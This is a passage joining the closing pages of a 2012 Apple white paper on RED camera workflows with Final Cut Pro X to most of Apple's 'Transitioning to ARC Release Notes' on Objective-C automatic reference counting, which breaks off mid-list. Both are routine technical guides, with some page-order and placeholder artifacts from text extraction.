ProRes codec Disk space is a consideration, or you’re editing a large multicam project. Apple ProRes 422 (Proxy) or Apple ProRes 422 (LT) You’re delivering Apple ProRes files as a final master for the web or TV. Apple ProRes 422 or Apple ProRes 422 (HQ) You’re delivering for theater projection or effects compositing. Apple ProRes 4444 Although you can transcode to the final delivery quality and then work with that throughout post-production, it’s more efficient to work with smaller frame sizes and higher image compression during the craft edit. So even though you may have shot at 4K or 5K resolution in the field, you can transcode to a smaller frame size to save time and disk space. For example, you can set the resolution to 1920x1080 or 1280x720, and you can set the debayer quality to 1/4. If you’re generating Apple ProRes files for use as proxy media, you can also choose to superimpose, or “burn in,” the source timecode and filename over the image. This makes it easy to go back to the original R3D files at any point during post-production for a quick visual double-check that the files are correct. For more details, see the REDCINE-X PRO manual at https://www.red.com/downloads. Note: You can speed up transcoding by using a RED ROCKET card, which offloads the processor-intensive debayer and decompression tasks from software to custom hardware. RED ROCKET can be a valuable tool when transcoding a large number of shots.White Paper 4 RED Workflows with Final Cut Pro X Apply One-Light Color Correction When recording with RED cameras, it’s common to shoot a scene “flat” to avoid clipping highlights and shadows and provide more flexibility when manipulating images in post-production. This recording setup can give the footage a washed-out appearance. Many editors and clients prefer working with more visually appealing images that include higher contrast and color saturation. To accommodate this workflow, the free REDCINE-X PRO application allows you to add a one-light color correction as part of the transcoding process. You can choose from several presets to create more common looks, or you can create your own look. Be sure to keep the original names of the R3D files when you generate new Apple ProRes media so that you can easily relink to them later. After you apply the one-light color correction during transcoding, it stays with the image until you go back to the original R3D file and create a new Apple ProRes version. Batch Sync Audio and Video Files After all your media has been transcoded, you can choose to sync second-source audio to the video files. You can sync the files directly in Final Cut Pro X using the built-in synchronization feature that analyzes waveforms to match the scratch audio in your video files to the high-quality audio from your field recorder. You can also use a third-party application like Intelligent Assistance’s Sync-N-Link X (www.intelligentassistance.com), RED’s REDCINE-X PRO (www.red.com/learn), or Singular Software’s PluralEyes (www.singularsoftware.com). Simply select all the audio and Apple ProRes video files and batch sync. Then export the XML to Final Cut Pro X, and all of the synced material is imported into an event, ready for editing. Import Files into Final Cut Pro X After creating Apple ProRes files with REDCINE-X PRO, you can import these files directly into Final Cut Pro X. Even if you transcode R3D files to a high-quality Apple ProRes codec, such as Apple ProRes 4444, you may still choose to use lightweight Apple ProRes 422 (Proxy) files for editing. Final Cut Pro X allows you to generate Apple ProRes proxy files in the background and seamlessly switch to these files for editing, providing great flexibility when editing on a notebook, for example. To create proxy files while importing media 1. In Final Cut Pro, choose File > Import > Files. 2. Select a file or folder, or Command-click to select multiple files to import. 3. Do one of the following: • To add the imported files to an existing event: Select “Add to existing Event,” and choose the event from the pop-up menu. • To create a new event: Select “Create new Event,” type a name in the text field, and choose the disk where you want to store the event from the “Save to” pop-up menu. 4. To have Final Cut Pro copy your media files and add them to the Final Cut Pro Events folder you specified, select the “Copy files to Final Cut Events folder” checkbox. If you’re working with a SAN and want to keep the files in a central location and have multiple users link to them, leave this option unselected. For more information, see Final Cut Pro X: Xsan Best Practices.White Paper 5 RED Workflows with Final Cut Pro X 5. Select the “Create proxy media” checkbox. When this option is selected, Final Cut Pro creates Apple ProRes 422 (Proxy) files in the background after the media files are imported. You can begin to edit your project and, when the proxy files are created, you can open Playback preferences and switch to the proxy files with a single click. 6. Click Import. Final Cut Pro imports your media in the background, and then creates proxy files in the background. You can view the progress of the background tasks in the Background Tasks window. You can now begin editing, even if importing and transcoding are not yet complete. To switch to the Apple ProRes proxy files, select “Use proxy media” in Final Cut Pro Playback preferences. It’s just as easy to switch back to the original media when the creative editing is finished and you want to work on color or effects at the highest quality. When you change these settings, all media in events and projects is affected. Edit in Final Cut Pro X and Export XML After all your media has been imported into Final Cut Pro X, you can edit just as you would any other project. The application was designed for modern, file-based workflows, making it easy to browse, organize, and edit large amounts of material. Use skimming to quickly view your footage. Mark range-based keywords and favorites, and save custom searches as Smart Collections. Quickly and easily arrange clips in the Timeline and add titles and effects, which render in the background as you work. When you’re finished editing, you can send your project to a third-party finishing system such as DaVinci Resolve. Just select the project in the Project Library, choose File > Export XML, and select a location to save the XML file. Color Grade in DaVinci Resolve and Export XML Choose Apple ProRes or RAW for Grading Before importing the Final Cut Pro X XML file into DaVinci Resolve, you should choose between a few different color grading workflows. If you edited with Apple ProRes 422 (HQ) or Apple ProRes 4444 in Final Cut Pro X, you may want to grade these same files in DaVinci Resolve. Alternatively, you can relink the project to the original R3D files in either DaVinci Resolve or REDCINE-X PRO. These RAW files offer a wide range of values to use when grading, which can help improve the look of images that were shot without extensive lighting control or that need a unique style. You can get more image detail out of the highlights and shadows, which is why so many colorists choose to use the RAW files in the color grading stage. White Paper 6 RED Workflows with Final Cut Pro X To relink to the original R3D media in DaVinci Resolve 1. In DaVinci Resolve Preferences, add the location of the R3D files to the Media Storage Volumes list. 2. Save the preferences and reopen DaVinci Resolve. 3. On the Browse page, import the R3D files to the Media Pool. 4. On the Conform page, in the Timeline Management section, click the Load button. 5. Select the XML file that you exported from Final Cut Pro X. 6. In the Load XML window, deselect “Automatically import source clips into media pool.” 7. Choose any other options that are applicable to your project, and click Ok. The XML file is imported and relinked to the corresponding media in the Media Pool using reel name and timecode. A new session appears in the Timeline Management list, and the edit appears in the Timeline. Note: Alternatively, if you’re working with large amounts of media and DaVinci Resolve 8.1 or later, you can have DaVinci Resolve relink to the R3D files automatically when you import the XML file. Just be sure to select the following checkboxes: • Automatically import source clips into media pool • Ignore file extensions when matching Render New Media After color grading the final project in DaVinci Resolve, you can choose the render format based on your final delivery. For example, you may choose to render Apple ProRes 4444 for theater projection, or Apple ProRes 422 if you’re delivering a master for the web or TV. You may want to set a handle length for the rendered media (at least one second), so that you can make additional changes such as adding a longer dissolve or extending an edit. For more details, see the DaVinci Resolve manual at http://www.blackmagic-design.com/support. Export XML from DaVinci Resolve and Import into Final Cut Pro X After you render the media in DaVinci Resolve, you can transfer the project back to Final Cut Pro X by exporting an XML file. To export an XML file from DaVinci Resolve 1. Open the Conform page and, in the Timeline Management list, select the session you want to export an XML file from. 2. Click the Export button at the bottom of the Timeline Management list. 3. In the Export XML dialog, choose FCP X XML 1.1 Files from the Format pop-up menu, type a name and choose a location for the exported XML file, and click Save. An XML version of that session is saved, complete with internal references to the graded media you rendered, and ready for importing into Final Cut Pro X. Import the XML file back into Final Cut Pro X using the Import XML command in the File menu. Make sure that you’re linking to the high-quality media by selecting “Use original or optimized media” in the Playback pane of the Final Cut Pro Preferences window. Now you can add finished audio, adjust titles, insert graphics, and continue to make editorial changes. Because you’ve imported the individual media files and the XML metadata instead of a single QuickTime movie, you can make changes right up to the last minute before delivery. For information about Final Cut Pro X, see Final Cut Pro X Help.White Paper 7 RED Workflows with Final Cut Pro X Copyright © 2012 Apple Inc. All rights reserved. Apple, the Apple logo, Final Cut, Final Cut Pro, QuickTime, and Xsan are trademarks of Apple Inc., registered in the U.S. and other countries. R3D, RED, REDCINE, REDCINE-X, REDCODE, REDMAG, and RED ROCKET are trademarks or registered trademarks of Red.com, Inc. in the United States and other countries. The YouTube logo is a trademark of Google Inc. Other product and company names mentioned herein may be trademarks of their respective companies. Mention of third-party products is for informational purposes only and constitutes neither an endorsement nor a recommendation. Apple assumes no responsibility with regard to the performance or use of these products. Product specifications are subject to change without notice. 019-2378 June 2012 Export a Master from Final Cut Pro X The final step in the workflow is to export a finished master from Final Cut Pro X. To export your project as a master file 1. To make sure the project’s render format is set to the quality level you want for the final master, select the project in the Project Library, click the Inspector button in the toolbar, and click the Project Properties button . The Render Format pop-up menu shows the current render codec. 2. Select the project in the Project Library and choose Share > Export Media (or press Command-E). 3. Choose an option from the Export pop-up menu. The default setting, Video and Audio, creates a movie file containing both video and audio. For information about the other options, see Final Cut Pro X Help. To export a file that matches the project’s properties, choose Current Settings from the “Video codec” pop-up menu. When you export using Current Settings, the final master is exported at the quality of the render settings, and the export is as fast as a file copy with no further compression added. 4. To see details about the file that will be output, click Summary. 5. Click Next, type a name and choose a location for the exported file, and click Save. If you’re exporting for review on the web, you can export an H.264 version directly to a private account on YouTube or Vimeo. You can also burn the project to a DVD, or to a Blu-ray disc if you have a third-party Blu-ray burner. If you have Compressor installed, you can choose Share > Send to Compressor to transfer your project to that application for total control over your final export settings. Compressor also allows you to set up render clusters that use the processors of multiple computers on a network. Create a Compressor droplet for drag-and-drop simplicity, or create custom export settings to match unique delivery requirements. If you need to output to tape, all three major video I/O device manufacturers offer free software to support tape delivery. The applications are AJA‘s VTR Xchange, Blackmagic Design’s Media Express, and Matrox’s Vetura. Download the application that works with your video I/O device and use the QuickTime export from Final Cut Pro X to lay back to tape. Conclusion Using Apple ProRes for editing and R3D RAW files for color grading enables a highly flexible workflow optimized for speed, quality, and creative control. This process also takes advantage of the metadata and XML capabilities of Final Cut Pro X, which have been designed for the future of file-based production. By using this document as a template for working with RED and Final Cut Pro X, editors and post-production facilities can further customize the process to suit their unique needs. Transitioning to ARC Release NotesContents Transitioning to ARC Release Notes 3 Summary 3 ARC Overview 4 ARC Enforces New Rules 5 ARC Introduces New Lifetime Qualifiers 7 ARC Uses a New Statement to Manage Autorelease Pools 11 Patterns for Managing Outlets Become Consistent Across Platforms 11 Stack Variables Are Initialized with nil 12 Use Compiler Flags to Enable and Disable ARC 12 Managing Toll-Free Bridging 12 The Compiler Handles CF Objects Returned From Cocoa Methods 13 Cast Function Parameters Using Ownership Keywords 14 Common Issues While Converting a Project 15 Frequently Asked Questions 19 Document Revision History 23 2012-07-17 | © 2012 Apple Inc. All Rights Reserved. 2Automatic Reference Counting (ARC) is a compiler feature that provides automatic memory management of Objective-C objects. Rather than having to think about about retain and release operations, ARC allows you to concentrate on the interesting code, the object graphs, and the relationships between objects in your application. {app_code} {app_code} {app_code} {app_code} {app_code} {app_code} {app_code} {app_code} {app_code} {app_code} Reference counting manually Automatic Reference Counting retain/release code retain/release code retain/release code retain/release code retain/release code retain/release code Time to produce Time to produce Summary ARC works by adding code at compile time to ensure that objects live as long as necessary, but no longer. Conceptually, it follows the same memory management conventions as manual reference counting (described in Advanced Memory Management Programming Guide ) by adding the appropriate memory management calls for you. 2012-07-17 | © 2012 Apple Inc. All Rights Reserved. 3 Transitioning to ARC Release NotesIn order for the compiler to generate correct code, ARC restricts the methods you can use and how you use toll-free bridging (see “Toll-Free Bridged Types”). ARC also introduces new lifetime qualifiers for object references and declared properties. ARC is supported in Xcode 4.2 for OS X v10.6 and v10.7 (64-bit applications) and for iOS 4 and iOS 5. Weak references are not supported in OS X v10.6 and iOS 4. Xcode provides a tool that automates the mechanical parts of the ARC conversion (such as removing retain and release calls) and helps you to fix issues the migrator can’t handle automatically (choose Edit > Refactor > Convert to Objective-C ARC). The migration tool converts all filesin a project to use ARC. You can also choose to use ARC on a per-file basis if it’s more convenient for you to use manual reference counting for some files. See also: ● Advanced Memory Management Programming Guide ● Memory Management Programming Guide for Core Foundation ARC Overview Instead of you having to remember when to use retain, release, and autorelease, ARC evaluates the lifetime requirements of your objects and automatically inserts appropriate memory management calls for you at compile time. The compiler also generates appropriate dealloc methods for you. In general, if you’re only using ARC the traditional Cocoa naming conventions are important only if you need to interoperate with code that uses manual reference counting. A complete and correct implementation of a Person class might look like this: @interface Person : NSObject @property NSString *firstName; @property NSString *lastName; @property NSNumber *yearOfBirth; @property Person *spouse; @end @implementation Person @end Transitioning to ARC Release Notes ARC Overview 2012-07-17 | © 2012 Apple Inc. All Rights Reserved. 4(Object properties are strong by default; the strong attribute is described in “ARC Introduces New Lifetime Qualifiers” (page 7).) Using ARC, you could implement a contrived method like this: - (void)contrived { Person *aPerson = [[Person alloc] init]; [aPerson setFirstName:@"William"]; [aPerson setLastName:@"Dudney"]; [aPerson setYearOfBirth:[[NSNumber alloc] initWithInteger:2011]]; NSLog(@"aPerson: %@", aPerson); } ARC takes care of memory management so that neither the Person nor the NSNumber objects are leaked. You could also safely implement a takeLastNameFrom: method of Person like this: - (void)takeLastNameFrom:(Person *)person { NSString *oldLastname = [self lastName]; [self setLastName:[person lastName]]; NSLog(@"Lastname changed from %@ to %@", oldLastname, [self lastName]); } ARC ensures that oldLastName is not deallocated before the NSLog statement. ARC Enforces New Rules To work, ARC imposes some new rules that are not present when using other compiler modes. The rules are intended to provide a fully reliable memory management model; in some cases, they simply enforce best practice, in some others they simplify your code or are obvious corollaries of your not having to deal with memory management. If you violate these rules, you get an immediate compile-time error, not a subtle bug that may become apparent at runtime. ● You cannot explicitly invoke dealloc, or implement or invoke retain, release, retainCount, or autorelease. The prohibition extends to using @selector(retain), @selector(release), and so on. Transitioning to ARC Release Notes ARC Overview 2012-07-17 | © 2012 Apple Inc. All Rights Reserved. 5You may implement a dealloc method if you need to manage resources other than releasing instance variables. You do not have to (indeed you cannot) release instance variables, but you may need to invoke [systemClassInstance setDelegate:nil] on system classes and other code that isn’t compiled using ARC. Custom dealloc methods in ARC do not require a call to [super dealloc] (it actually results in a compiler error). The chaining to super is automated and enforced by the compiler. You can still use CFRetain, CFRelease, and other related functions with Core Foundation-style objects (see “Managing Toll-Free Bridging” (page 12)). ● You cannot use NSAllocateObject or NSDeallocateObject. You create objects using alloc; the runtime takes care of deallocating objects. ● You cannot use object pointers in C structures. Rather than using a struct, you can create an Objective-C class to manage the data instead. ● There is no casual casting between id and void *. You must use special caststhat tell the compiler about object lifetime. You need to do thisto cast between Objective-C objects and Core Foundation types that you pass as function arguments. For more details, see “Managing Toll-Free Bridging” (page 12). ● You cannot use NSAutoreleasePool objects. ARC provides @autoreleasepool blocks instead. These have an advantage of being more efficient than NSAutoreleasePool. ● You cannot use memory zones. There is no need to use NSZone any more—they are ignored by the modern Objective-C runtime anyway. To allow interoperation with manual retain-release code, ARC imposes a constraint on method naming: ● You cannot give an accessor a name that begins with new. This in turn means that you can’t, for example, declare a property whose name begins with new unless you specify a different getter: // Won't work: @property NSString *newTitle; // Works: @property (getter=theNewTitle) NSString *newTitle; Transitioning to ARC Release Notes ARC Overview 2012-07-17 | © 2012 Apple Inc. All Rights Reserved. 6ARC Introduces New Lifetime Qualifiers ARC introduces several new lifetime qualifiers for objects, and weak references. A weak reference does not extend the lifetime of the object it points to, and automatically becomes nil when there are no strong references to the object. You should take advantage of these qualifiers to manage the object graphs in your program. In particular, ARC does not guard against strong reference cycles (previously known as retain cycles—see “Practical Memory Management”). Judicious use of weak relationships will help to ensure you don’t create cycles. Property Attributes The keywords weak and strong are introduced as new declared property attributes, asshown in the following examples. // The following declaration is a synonym for: @property(retain) MyClass *myObject; @property(strong) MyClass *myObject; // The following declaration is similar to "@property(assign) MyClass *myObject;" // except that if the MyClass instance is deallocated, // the property value is set to nil instead of remaining as a dangling pointer. @property(weak) MyClass *myObject; Under ARC, strong is the default for object types. Variable Qualifiers You use the following lifetime qualifiers for variables just like you would, say, const. __strong __weak __unsafe_unretained __autoreleasing ● __strong is the default. An object remains “alive” as long as there is a strong pointer to it. ● __weak specifies a reference that does not keep the referenced object alive. A weak reference is set to nil when there are no strong references to the object. Transitioning to ARC Release Notes ARC Overview 2012-07-17 | © 2012 Apple Inc. All Rights Reserved. 7● __unsafe_unretained specifies a reference that does not keep the referenced object alive and is not set to nil when there are no strong references to the object. If the object it references is deallocated, the pointer is left dangling. ● __autoreleasing is used to denote argumentsthat are passed by reference (id *) and are autoreleased on return. You should decorate variables correctly. When using qualifiers in an object variable declaration, the correct format is: ClassName * qualifier variableName; for example: MyClass * __weak myWeakReference; MyClass * __unsafe_unretained myUnsafeReference; Other variants are technically incorrect but are “forgiven” by the compiler. To understand the issue, see http://cdecl.org/. Take care when using __weak variables on the stack. Consider the following example: NSString * __weak string = [[NSString alloc] initWithFormat:@"First Name: %@", [self firstName]]; NSLog(@"string: %@", string); Although string is used after the initial assignment, there is no other strong reference to the string object at the time of assignment; it is therefore immediately deallocated. The log statement shows that string has a null value. (The compiler provides a warning in this situation.) You also need to take care with objects passed by reference. The following code will work: NSError *error; BOOL OK = [myObject performOperationWithError:&error]; if (!OK) { // Report the error. // ... However, the error declaration is implicitly: Transitioning to ARC Release Notes ARC Overview 2012-07-17 | © 2012 Apple Inc. All Rights Reserved. 8NSError * __strong e; and the method declaration would typically be: -(BOOL)performOperationWithError:(NSError * __autoreleasing *)error; The compiler therefore rewrites the code: NSError * __strong error; NSError * __autoreleasing tmp = error; BOOL OK = [myObject performOperationWithError:&tmp]; error = tmp; if (!OK) { // Report the error. // ... The mismatch between the local variable declaration (__strong) and the parameter (__autoreleasing) causesthe compiler to create the temporary variable. You can get the original pointer by declaring the parameter id __strong * when you take the address of a __strong variable. Alternatively you can declare the variable as __autoreleasing. Use Lifetime Qualifiers to Avoid Strong Reference Cycles You can use lifetime qualifiers to avoid strong reference cycles. For example, typically if you have a graph of objects arranged in a parent-child hierarchy and parents need to refer to their children and vice versa, then you make the parent-to-child relationship strong and the child-to-parent relationship weak. Other situations may be more subtle, particularly when they involve block objects. In manual reference counting mode, __block id x; hasthe effect of not retaining x. In ARC mode, __block id x; defaults to retaining x (just like all other values). To get the manual reference counting mode behavior under ARC, you could use __unsafe_unretained __block id x;. As the name __unsafe_unretained implies, however, having a non-retained variable is dangerous (because it can dangle) and is therefore discouraged. Two better options are to either use __weak (if you don’t need to support iOS 4 or OS X v10.6), or set the __block value to nil to break the retain cycle. The following code fragment illustrates this issue using a pattern that is sometimes used in manual reference counting. Transitioning to ARC Release Notes ARC Overview 2012-07-17 | © 2012 Apple Inc. All Rights Reserved. 9MyViewController *myController = [[MyViewController alloc] init…]; // ... myController.completionHandler = ^(NSInteger result) { [myController dismissViewControllerAnimated:YES completion:nil]; }; [self presentViewController:myController animated:YES completion:^{ [myController release]; }]; As described, instead, you can use a __block qualifier and set the myController variable to nil in the completion handler: MyViewController * __block myController = [[MyViewController alloc] init…]; // ... myController.completionHandler = ^(NSInteger result) { [myController dismissViewControllerAnimated:YES completion:nil]; myController = nil; }; Alternatively, you can use a temporary __weak variable. The following example illustrates a simple implementation: MyViewController *myController = [[MyViewController alloc] init…]; // ... MyViewController * __weak weakMyViewController = myController; myController.completionHandler = ^(NSInteger result) { [weakMyViewController dismissViewControllerAnimated:YES completion:nil]; }; For non-trivial cycles, however, you should use: MyViewController *myController = [[MyViewController alloc] init…]; // ... MyViewController * __weak weakMyController = myController; myController.completionHandler = ^(NSInteger result) { Transitioning to ARC Release Notes ARC Overview 2012-07-17 | © 2012 Apple Inc. All Rights Reserved. 10MyViewController *strongMyController = weakMyController; if (strongMyController) { // ... [strongMyController dismissViewControllerAnimated:YES completion:nil]; // ... } else { // Probably nothing... } }; In some cases you can use __unsafe_unretained if the class isn’t __weak compatible. This can, however, become impractical for nontrivial cycles because it can be hard or impossible to validate that the __unsafe_unretained pointer is still valid and still points to the same object in question. ARC Uses a New Statement to Manage Autorelease Pools Using ARC, you cannot manage autorelease pools directly using the NSAutoreleasePool class. Instead, you use @autoreleasepool blocks: @autoreleasepool { // Code, such as a loop that creates a large number of temporary objects. } This simple structure allows the compiler to reason about the reference count state. On entry, an autorelease pool is pushed. On normal exit (break, return, goto, fall-through, and so on) the autorelease pool is popped. For compatibility with existing code, if exit is due to an exception, the autorelease pool is not popped. Thissyntax is available in all Objective-C modes. It is more efficient than using the NSAutoreleasePool class; you are therefore encouraged to adopt it in place of using the NSAutoreleasePool. Patterns for Managing Outlets Become Consistent Across Platforms The patternsfor declaring outletsin iOS and OS X change with ARC and become consistent across both platforms. The pattern you should typically adopt is: outletsshould be weak, except for those from File’s Owner to top-level objects in a nib file (or a storyboard scene) which should be strong. Full details are given in “Nib Files” in Resource Programming Guide . Transitioning to ARC Release Notes ARC Overview 2012-07-17 | © 2012 Apple Inc. All Rights Reserved. 11Stack Variables Are Initialized with nil Using ARC,strong, weak, and autoreleasing stack variables are now implicitly initialized with nil. For example: - (void)myMethod { NSString *name; NSLog(@"name: %@", name); } will log null for the value of name rather than perhaps crashing. Use Compiler Flags to Enable and Disable ARC You enable ARC using a new -fobjc-arc compiler flag. You can also choose to use ARC on a per-file basis if it’s more convenient for you to use manual reference counting for some files. For projects that employ ARC as the default approach, you can disable ARC for a specific file using a new -fno-objc-arc compiler flag for that file. ARC is supported in Xcode 4.2 and later OS X v10.6 and later (64-bit applications) and for iOS 4 and later. Weak references are not supported in OS X v10.6 and iOS 4. There is no ARC support in Xcode 4.1 and earlier. Managing Toll-Free Bridging In many Cocoa applications, you need to use Core Foundation-style objects, whether from the Core Foundation framework itself (such as CFArrayRef or CFMutableDictionaryRef) or from frameworks that adopt Core Foundation conventions such as Core Graphics (you might use types like CGColorSpaceRef and CGGradientRef). The compiler does not automatically manage the lifetimes of Core Foundation objects; you must call CFRetain and CFRelease (or the corresponding type-specific variants) as dictated by the Core Foundation memory management rules (see Memory Management Programming Guide for Core Foundation ). If you cast between Objective-C and Core Foundation-style objects, you need to tell the compiler about the ownership semantics of the object using either a cast (defined in objc/runtime.h) or a Core Foundation-style macro (defined in NSObject.h): ● __bridge transfers a pointer between Objective-C and Core Foundation with no transfer of ownership. ● __bridge_retained or CFBridgingRetain casts an Objective-C pointer to a Core Foundation pointer and also transfers ownership to you. Transitioning to ARC Release Notes Managing Toll-Free Bridging 2012-07-17 | © 2012 Apple Inc. All Rights Reserved. 12You are responsible for calling CFRelease or a related function to relinquish ownership of the object. ● __bridge_transfer or CFBridgingRelease moves a non-Objective-C pointer to Objective-C and also transfers ownership to ARC. ARC is responsible for relinquishing ownership of the object. For example, if you had code like this: - (void)logFirstNameOfPerson:(ABRecordRef)person { NSString *name = (NSString *)ABRecordCopyValue(person, kABPersonFirstNameProperty); NSLog(@"Person's first name: %@", name); [name release]; } you could replace it with: - (void)logFirstNameOfPerson:(ABRecordRef)person { NSString *name = (NSString *)CFBridgingRelease(ABRecordCopyValue(person, kABPersonFirstNameProperty)); NSLog(@"Person's first name: %@", name); } The Compiler Handles CF Objects Returned From Cocoa Methods The compiler understands Objective-C methods that return Core Foundation types follow the historical Cocoa naming conventions (see Advanced Memory Management Programming Guide ). For example, the compiler knows that, in iOS, the CGColor returned by the CGColor method of UIColor is not owned. You must still use an appropriate type cast, as illustrated by this example: NSMutableArray *colors = [NSMutableArray arrayWithObject:(id)[[UIColor darkGrayColor] CGColor]]; [colors addObject:(id)[[UIColor lightGrayColor] CGColor]]; Transitioning to ARC Release Notes Managing Toll-Free Bridging 2012-07-17 | © 2012 Apple Inc. All Rights Reserved. 13Cast Function Parameters Using Ownership Keywords When you cast between Objective-C and Core Foundation objectsin function calls, you need to tell the compiler about the ownership semantics of the passed object. The ownership rules for Core Foundation objects are those specified in the Core Foundation memory management rules (see Memory Management Programming Guide for Core Foundation ); rules for Objective-C objects are specified in Advanced Memory Management Programming Guide . In the following code fragment, the array passed to the CGGradientCreateWithColors function requires an appropriate cast. Ownership of the object returned by arrayWithObjects: is not passed to the function, thus the cast is __bridge. NSArray *colors = <#An array of colors#>; CGGradientRef gradient = CGGradientCreateWithColors(colorSpace, (__bridge CFArrayRef)colors, locations); The code fragment is shown in context in the following method implementation. Notice also the use of Core Foundation memory management functions where dictated by the Core Foundation memory management rules. - (void)drawRect:(CGRect)rect { CGContextRef ctx = UIGraphicsGetCurrentContext(); CGColorSpaceRef colorSpace = CGColorSpaceCreateDeviceGray(); CGFloat locations[2] = {0.0, 1.0}; NSMutableArray *colors = [NSMutableArray arrayWithObject:(id)[[UIColor darkGrayColor] CGColor]]; [colors addObject:(id)[[UIColor lightGrayColor] CGColor]]; CGGradientRef gradient = CGGradientCreateWithColors(colorSpace, (__bridge CFArrayRef)colors, locations); CGColorSpaceRelease(colorSpace); // Release owned Core Foundation object. CGPoint startPoint = CGPointMake(0.0, 0.0); CGPoint endPoint = CGPointMake(CGRectGetMaxX(self.bounds), CGRectGetMaxY(self.bounds)); CGContextDrawLinearGradient(ctx, gradient, startPoint, endPoint, kCGGradientDrawsBeforeStartLocation | kCGGradientDrawsAfterEndLocation); CGGradientRelease(gradient); // Release owned Core Foundation object. } Transitioning to ARC Release Notes Managing Toll-Free Bridging 2012-07-17 | © 2012 Apple Inc. All Rights Reserved. 14Common Issues While Converting a Project When migrating existing projects, you are likely to run into various issues. Here are some common issues, together with solutions. You can’t invoke retain, release, or autorelease. This is a feature. You also can’t write: while ([x retainCount]) { [x release]; } You can’t invoke dealloc. You typically invoke dealloc if you are implementing a singleton or replacing an object in an init methods. Forsingletons, use the shared instance pattern. In init methods, you don't have to call dealloc anymore, because the object will be freed when you overwrite self. You can’t use NSAutoreleasePool objects. Use the new @autoreleasepool{} construct instead. This forces a block structure on your autorelease pool, and is about six times faster than NSAutoreleasePool. @autoreleasepool even works in non-ARC code. Because @autoreleasepool is so much faster than NSAutoreleasePool, many old “performance hacks” can simply be replaced with unconditional @autoreleasepool. The migrator handles simple uses of NSAutoreleasePool, but it can't handle complex conditional cases, or cases where a variable is defined inside the body of the new @autoreleasepool and used after it. ARC requires you to assign the result of [super init] to self in init methods. The following is invalid in ARC init methods: [super init]; The simple fix is to change it to: self = [super init]; The proper fix is to do that, and check the result for nil before continuing: self = [super init]; if (self) { ... Transitioning to ARC Release Notes Common Issues While Converting a Project 2012-07-17 | © 2012 Apple Inc. All Rights Reserved. 15You can’t implement custom retain or release methods. Implementing custom retain or release methods breaks weak pointers. There are several common reasons for wanting to provide custom implementations: ● Performance. Please don’t do this any more; the implementation of retain and release for NSObject is much faster now. If you still find problems, please file bugs. ● To implement a custom weak pointer system. Use __weak instead. ● To implement singleton class. Use the shared instance pattern instead. Alternatively, use class instead of instance methods, which avoids having to allocate the object at all. “Assigned” instance variables become strong. Before ARC, instance variables were non-owning references—directly assigning an object to an instance variable did not extend the lifetime of the object. To make a property strong, you usually implemented or synthesized accessor methods that invoked appropriate memory management methods; in contrast, you may have implemented accessor methods like those shown in the following example to maintain a weak property. @interface MyClass : Superclass { id thing; // Weak reference. } // ... @end @implementation MyClass - (id)thing { return thing; } - (void)setThing:(id)newThing { thing = newThing; } // ... Transitioning to ARC Release Notes Common Issues While Converting a Project 2012-07-17 | © 2012 Apple Inc. All Rights Reserved. 16@end With ARC, instance variables are strong references by default—assigning an object to an instance variable directly does extend the lifetime of the object. The migration tool is not able to determine when an instance variable is intended to be weak. To maintain the same behavior as before, you must mark the instance variable as being weak, or use a declared property. @interface MyClass : Superclass { id __weak thing; } // ... @end @implementation MyClass - (id)thing { return thing; } - (void)setThing:(id)newThing { thing = newThing; } // ... @end Or: @interface MyClass : Superclass @property (weak) id thing; // ... @end @implementation MyClass @synthesize thing; // ... @end Transitioning to ARC Release Notes Common Issues While Converting a Project 2012-07-17 | © 2012 Apple Inc. All Rights Reserved. 17You can't use strong ids in C structures. For example, the following code won’t compile: struct X { id x; float y; }; This is because x defaults to strongly retained and the compiler can’t safely synthesize all the code required to make it work correctly. For example, if you pass a pointer to one of these structures through some code that ends up doing a free, each id would have to be released before the struct is freed. The compiler cannot reliably do this, so strong ids in structures are disallowed completely in ARC mode. There are a few possible solutions: 1. Use Objective-C objects instead of structs. This is considered to be best practice anyway. 2. If using Objective-C objects is sub-optimal, (maybe you want a dense array of these structs) then consider using a void* instead. This requires the use of the explicit casts, described below. 3. Mark the object reference as __unsafe_unretained. This approach may be useful for the semi-common patterns like this: struct x { NSString *S; int X; } StaticArray[] = { @"foo", 42, @"bar, 97, ... }; You declare the structure as: struct x { NSString * __unsafe_unretained S; int X; } This may be problematic and is unsafe if the object could be released out from under the pointer, but it is very useful for things that are known to be around forever like constant string literals. You can’t directly cast between id and void* (including Core Foundation types). This is discussed in greater detail in “Managing Toll-Free Bridging” (page 12). Transitioning to ARC Release Notes Common Issues While Converting a Project 2012-07-17 | © 2012 Apple Inc. All Rights Reserved. 18Frequently Asked Questions How do I think about ARC? Where does it put the retains/releases? Try to stop thinking about where the retain/release calls are put and think about your application algorithms instead. Think about “strong and weak” pointers in your objects, about object ownership, and about possible retain cycles. Do I still need to write dealloc methods for my objects? Maybe. Because ARC does not automate malloc/free, management of the lifetime of Core Foundation objects, file descriptors, and so on, you still free such resources by writing a dealloc method. You do not have to (indeed cannot) release instance variables, but you may need to invoke [self setDelegate:nil] on system classes and other code that isn’t compiled using ARC. dealloc methods in ARC do not require—or allow—a call to [super dealloc]; the chaining to super is handled and enforced by the runtime. Are retain cycles still possible in ARC? Yes. ARC automates retain/release, and inherits the issue of retain cycles. Fortunately, code migrated to ARC rarely starts leaking, because properties already declare whether the properties are retaining or not. How do blocks work in ARC? Blocks “just work” when you pass blocks up the stack in ARC mode, such as in a return. You don’t have to call Block Copy any more. You still need to use [^{} copy] when passing “down” the stack into arrayWithObjects: and other methods that do a retain. The one thing to be aware of isthat NSString * __block myString isretained in ARC mode, not a possibly dangling pointer. To get the previous behavior, use __block NSString * __unsafe_unretained myString or (better still) use __block NSString * __weak myString. Can I develop applications for OS X with ARC using Snow Leopard? No. The Snow Leopard version of Xcode 4.2 doesn’t support ARC at all on OS X, because it doesn’t include the 10.7 SDK. Xcode 4.2 for Snow Leopard does support ARC for iOS though, and Xcode 4.2 for Lion supports both OS X and iOS. This means you need a Lion system to build an ARC application that runs on Snow Leopard. Can I create a C array of retained pointers under ARC? Transitioning to ARC Release Notes Frequently Asked Questions 2012-07-17 | © 2012 Apple Inc. All Rights Reserved. 19Yes, you can, as illustrated by this example: // Note calloc() to get zero-filled memory. __strong SomeClass **dynamicArray = (__strong SomeClass **)calloc(sizeof(SomeClass *), entries); for (int i = 0; i < entries; i++) { dynamicArray[i] = [[SomeClass alloc] init]; } // When you're done, set each entry to nil to tell ARC to release the object. for (int i = 0; i < entries; i++) { dynamicArray[i] = nil; } free(dynamicArray); There are a number of aspects to note: ● You will need to write __strong SomeClass ** in some cases, because the default is __autoreleasing SomeClass **. ● The allocated memory must be zero-filled. ● You must set each element to nil before freeing the array (memset or bzero will not work). ● 